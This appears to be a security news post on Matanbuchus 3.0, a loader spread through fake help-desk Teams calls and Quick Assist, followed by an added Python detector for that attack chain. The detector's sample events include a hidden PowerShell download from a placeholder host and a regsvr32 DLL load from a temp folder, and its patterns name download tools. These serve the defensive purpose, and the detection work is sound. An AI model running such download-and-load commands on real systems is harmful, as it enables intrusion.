Fake “IT Help Desk” Teams Calls Drop Sneaky Matanbuchus 3.0 Malware

Researchers have spotted Matanbuchus 3.0, an upgraded malware‑as‑a‑service loader, being pushed through Microsoft Teams calls that pose as helpful IT staff. Targets are tricked into launching Quick Assist, granting attackers remote access so they can run a PowerShell script that drops the loader. Matanbuchus 3.0 boasts stealthier comms, in‑memory tricks, and support for CMD/PowerShell reverse shells. Sold for $10–15 k per month, it can fetch extra payloads like Cobalt Strike or ransomware. The initial payload is hidden in an archive containing a renamed Notepad++ updater (GUP), a tweaked XML file and a malicious DLL. Tactics echo those of Black Basta affiliates who combine phishing, Teams spoofing and remote‑desktop tools to breach firms.

Another day, another dodgy Teams call. This time crooks are peddling Matanbuchus 3.0, a malware loader that’s grown sharper teeth and a heftier price tag (£8–12 k a month, if you’re shopping).

How the scam works
1. An unexpected Teams call pops up, allegedly from “IT Support”.
2. The friendly voice persuades you to open Quick Assist so they can “fix” your PC.
3. A PowerShell one‑liner whizzes by, downloading an archive.
4. Inside: a fake Notepad++ updater, a tweaked XML, and one nasty DLL—aka Matanbuchus.

Why it’s nasty
• Sneakier comms and in‑memory execution keep AV tools snoozing.
• Fetches Cobalt Strike or ransomware on demand.
• Runs regsvr32, rundll32, msiexec—you name it—to stay under the radar.

Stay safe
• Verify every Teams caller (ring back via an internal number).
• Block Quick Assist for non‑admin users.
• Monitor for odd PowerShell spawns and side‑loaded DLLs.

Remember: if “IT” rings unannounced asking for remote control, hang up faster than you can say, “Have you tried turning it off and on again?”
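For the “monitor for odd PowerShell spawns and side‑loaded DLLs” advice, here is a small, added detector that walks process‑creation events and flags the chain the post describes: a remote‑assistance tool starting, a shell pulling down an archive, and then regsvr32/rundll32/msiexec being fed a DLL from a user‑writable folder. It is example code written for this page, not anything from the article or from a vendor; the log lines are constructed, and the image names used for Quick Assist (`quickassist.exe`) and the renamed updater (`updater.exe`) are assumptions, not indicators taken from the post.

```python
"""Toy detector for the help-desk-call-to-loader chain described above.

Added example, not code from the article or from any vendor. Events are
constructed Sysmon-style process-creation records; the Quick Assist and
renamed-updater image names below are assumptions, not real indicators.
"""
import os
import re
from dataclasses import dataclass

# Folders an ordinary user can write to. A LOLBin handed a DLL from one of these,
# or launched by something running from one, is the side-loading shape to watch.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "msiexec.exe"}   # the three named in the post
REMOTE_ASSIST = {"quickassist.exe"}                         # assumption: Quick Assist image name
DOWNLOAD_HINT = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE)
ARCHIVE_EXT = re.compile(r"\.(zip|7z|rar)\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the newly created process
    cmdline: str        # command line of the new process


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path, portable to non-Windows hosts."""
    return os.path.basename(path.replace("\\", "/")).lower()


def _in_user_writable(text: str) -> bool:
    return any(marker in text.lower() for marker in USER_WRITABLE)


def classify(ev: ProcEvent) -> list:
    """Return the rule names one event trips; an empty list means nothing odd."""
    hits = []
    child = _base(ev.image)
    if child in REMOTE_ASSIST:
        hits.append("remote-assistance tool launched")
    if child in SHELLS and DOWNLOAD_HINT.search(ev.cmdline) and ARCHIVE_EXT.search(ev.cmdline):
        hits.append("shell downloading an archive")
    if child in LOLBINS and ".dll" in ev.cmdline.lower() and _in_user_writable(ev.cmdline):
        hits.append("LOLBin loading a DLL from a user-writable path")
    if child in LOLBINS and _in_user_writable(ev.parent_image):
        hits.append("LOLBin spawned by a process running from a user-writable path")
    return hits


def scan(events: list) -> list:
    """Walk an ordered event stream and return [(index, hits)] for flagged events.

    A shell download that follows a remote-assistance launch in the same stream is
    escalated, because that ordering is exactly the fake help-desk ruse.
    """
    flagged, assist_seen = [], False
    for i, ev in enumerate(events):
        hits = classify(ev)
        if "remote-assistance tool launched" in hits:
            assist_seen = True
        if assist_seen and "shell downloading an archive" in hits:
            hits.append("download occurred after remote-assistance session started")
        if hits:
            flagged.append((i, hits))
    return flagged


# Constructed sample stream (not real telemetry). Paths and names are illustrative.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Microsoft Teams\ms-teams.exe",
              "ms-teams.exe"),                                          # benign
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\quickassist.exe",
              "quickassist.exe"),                                       # assumed image name
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://example.invalid/update.zip '
              r'-OutFile C:\Users\alice\AppData\Local\Temp\update.zip"'),
    # Renamed updater (the post describes a renamed Notepad++ GUP) registering a DLL
    # from the same temp folder. "updater.exe" and "payload.dll" are placeholders.
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\upd\updater.exe",
              r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\upd\payload.dll"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL"),              # benign Control Panel use
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\inventory.ps1"),        # benign admin script
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {_base(SAMPLE_EVENTS[index].image)} -> {hits}")
```

The rules deliberately key on where things run from and what they are asked to load rather than on file names, since the loader ships as a renamed legitimate updater and the DLL name is attacker‑chosen; the stateful ordering check in `scan` is the part that turns three individually noisy signals into one high‑confidence alert.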